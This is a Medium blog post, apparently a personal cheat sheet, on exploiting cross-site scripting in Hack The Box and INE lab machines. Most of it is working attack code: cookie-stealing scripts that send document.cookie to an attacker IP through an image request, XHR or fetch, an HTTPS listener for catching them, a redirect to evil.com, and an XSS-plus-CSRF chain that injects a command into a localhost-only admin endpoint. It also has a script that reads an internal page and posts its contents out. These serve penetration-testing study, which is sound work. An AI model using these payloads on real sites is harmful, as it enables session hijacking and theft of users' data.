Exploiting XSS-stealing cookies, csrf

Cookie Stealing-

(Note: HttpOnly should not be enabled/present in cookie header)

  1. Classic way-
<script>var i=new Image(); i.src="http://10.10.14.8/?cookie="+btoa(document.cookie);</script>

Here we have used btoa() method for converting the cookie string into base64 encoded string.

python3 -m http.server -m 80

2. Bypassing secure flag protection-

a) Creating a HTTPS server-

openssl req -new -x509 -keyout localhost.pem -out localhost.pem -days 365 -nodes

Generating certificate.

#!/usr/bin/python3
import http.server, ssl
server_address = ('0.0.0.0', 443)
httpd = http.server.HTTPServer(server_address, http.server.SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap_socket(httpd.socket,server_side=True,certfile='localhost.pem')
"""ssl_version=ssl.PROTOCOL_TLSv1_2)
"""
httpd.serve_forever()

Starting web server.

2. Via XHR-

var xhr=new XMLHttpRequest(); 
xhr.open("GET", "https://10.10.14.8/?"+document.cookie, true);
xhr.send();

3. Fetch api

Redirecting User to malicious websites-

<script>window.location.replace("http://evil.com");</script>

Accessing internal application/Bypassing localhost restrictions-

Suppose Some functionality in web app which can be accessed only from local server. And if xss is getting triggered on serverside when a Administrator user is browsing vulnerable web app while logged in, then it is possible to access this internal functionality by combining XSS+CSRF by using a xhr request.

Scenario 1:

Sample source code:

if($_SERVER['REMOTE_ADDR'] == "::1")
{
system($_POST['cmd']);
} else
{
echo "It's only allowed to access this function from localhost (::1).<br> This is due to the recent hack attempts on our server.";
}

XHR request js file-

var http = new XMLHttpRequest();
var url = 'http://127.0.0.1/admin/backdoorchecker.php';
var params = 'orem=dir | ping -n 5 10.10.14.8';
http.open('POST', url, true);
http.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
http.withCredentials = true;
http.send(params);
<script src=http://10.10.14.8:80/robme.js></script>

Scenerio 2: Stacked.htb

Referer http header is vuln to xss.

Our XSS is being triggered at other application hosted on domain mail.stacked.htb which was not accessible from external network.

So for accessing that we will be using simple javascript as below in our xss payload:

//apni.js
var url="http://mail.stacked.htb/" //targeturl(internal wep application)
var xhr=new XMLHttpRequest();
xhr.open("GET", url, false);
xhr.send();
var resp=xhr.responseText;
//transferring HTTP response to us
var xhr2=new XMLHttpRequest();
xhr2.open("POST", 'http://10.10.14.89:443/', false);
xhr2.send(resp);

XSS payload-

<script src="http://10.10.14.89/apni.js"></script>

And we start netcat listener for capturing response of our xhr.

We can open this html in browser to view the application.

DOM XSS

INE: WebApp Labs Web Application attacks LAB 30

window.onload = function() {var site=document.location.href;var index = site.indexOf("=", 0);name="";if(index != -1) {name=site.substr(index+1);}name=decodeURIComponent(name);document.getElementById('name').innerHTML=name;}

Payload:

<img src='lol' onerror="alert(1)">

XSS via file uploads:

Note: Below Scenario is there in meta htb machine.

exiftool -Comment='<H1>Hello</H1>' Untitled.png

Verified HTML injection.

For XSS we can try the below payload:

<img src=x onerror=alert(document.domain)>

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
n00🔑

n00🔑

Computer Security Enthusiast. Tries to understand how computers work. Would love to hear your suggestions and feedback. https://www.linkedin.com/in/pswalia2u/